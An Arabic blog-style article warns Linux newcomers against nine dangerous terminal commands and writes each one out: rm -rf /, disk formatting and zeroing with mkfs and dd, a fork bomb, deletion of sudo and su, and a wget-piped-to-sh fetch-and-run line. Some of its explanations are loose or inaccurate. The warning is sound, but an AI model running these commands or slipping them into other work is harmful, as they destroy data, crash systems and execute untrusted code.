9 اوامر لا يجب عليك استخدامها على Linux

في السنوات الاخيرة انتشر نظام لينكس (Linux) انتشار واسع بين انظمة التشغيل ، ولكن يوجد الكثير من المستخدمين الذين يظنون ان نظام لينكس هو سهل تعلمه ، ويقوموا بنسخ اكواد ويصقونها في محرر الاوامر (Terminal) بدون معرفة ما هو معنى هذه الاكواد ، في هذا الموضوع سوف اقربك من اكواد يجب عليك تجنب استخدامها لانها تؤدي الى تدمير النظام .

rm -rf /
هو امر خطير يقوم بحذف جميع الملفات الموجودة سواء على القرص الصلب او على اي وحدة تخزين متصلة بالجهاز ، فيكفي ان تقوم بكتابة هذا الامر في محرر الاوامر سوف ينفذ الامر بدون اي رسالة تحذيرية او تاكيد الامر .

mkfs.ext3 /dev/hda
هذا الامر يقوم بعمل فورمات للقرص الصلب وحذف البيانات الموجودة عليه ، هذا الامر يقوم بفرمتة القرص الصلب بإستخدام نظام ext3 .

command > /dev/hda
هذا الاخير الذي سوف يقوم بالكتابة على القرص الصلب بصورة اكثر من المتوقع ، حيث يقوم بتكرير الكتابة على القرص الصلب عدة مرات ، من ناحية اخرى يقوم بعمل ثقل على الجهاز ويؤدي الى تجمد النظام وسقوطه .

dd if=/dev/zero of=/dev/hda
اليك طريقة اخرى لتدمير نظامك ولكن هذه تصفير الجهاز تماما ولن تتمكن من استعادة البيانات المحذوفة حتى لو استخدمت افضل البرامج ، لان هذا الامر يقوم بعمل (Wiping) للنظام اي مسح كامل وكانك اشتريت قرص صلب جديد .

mv / /dev/null
اذا كنت تعبت من فايروسات تدمير القرص الصلب ، فهذا الامر على لينكس لا يحتاج اي جهد او الى تصميم فايروس ، ولكن هذا الامر لوحده قوم بتدمير القرص الصلب نهائيا ، وهي تمثل ثقب اسود تلتهم من اجل تدمير النظام .

wget http://some_untrusted_source -O- | sh 
هذا الذي سوف يقوم بتحميل سكربت مجهول المصدر "غير موثوق" وفي الاغلب يكون تطبيق ضار لهذا يجب عليك الابتعاد عن مثل هذه الاوامر .

:(){:|:&};:
هذا الامر الذي يطلق عليه القنبلة الشوكية ، هذا الذي ايضا ينقسم الى نصفين وكل نصف يقوم بنسخ نفسه عدة مرات الى حين ان يتجمد النظام .

rm -f /usr/bin/sudo;rm -f /bin/su
هذا الذي سيقوم بتعطيل صلاحيات (Root) عادة وهو يستخدم امر rm لتعطيل اكثر امرين مهمين على النظام ، هذا الاخير الذي يسمح لك بتشغيل باقي الاوامر بصلاحيات (root) هو يقوم بحذف الامرين بدون اي صندوق تاكيد .

dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic

كما في الويندوز الشاشة الزرقاء ، وكما هو معروف ان نظام لينكس اكثر امانا ولكن هذا شيء خاطئ ، لان هذا الامر يقوم بعمل اخطاء داخل النظام كالشاشة الزرقاء في الويندوز .


شارك الموضوع مع اصدقائك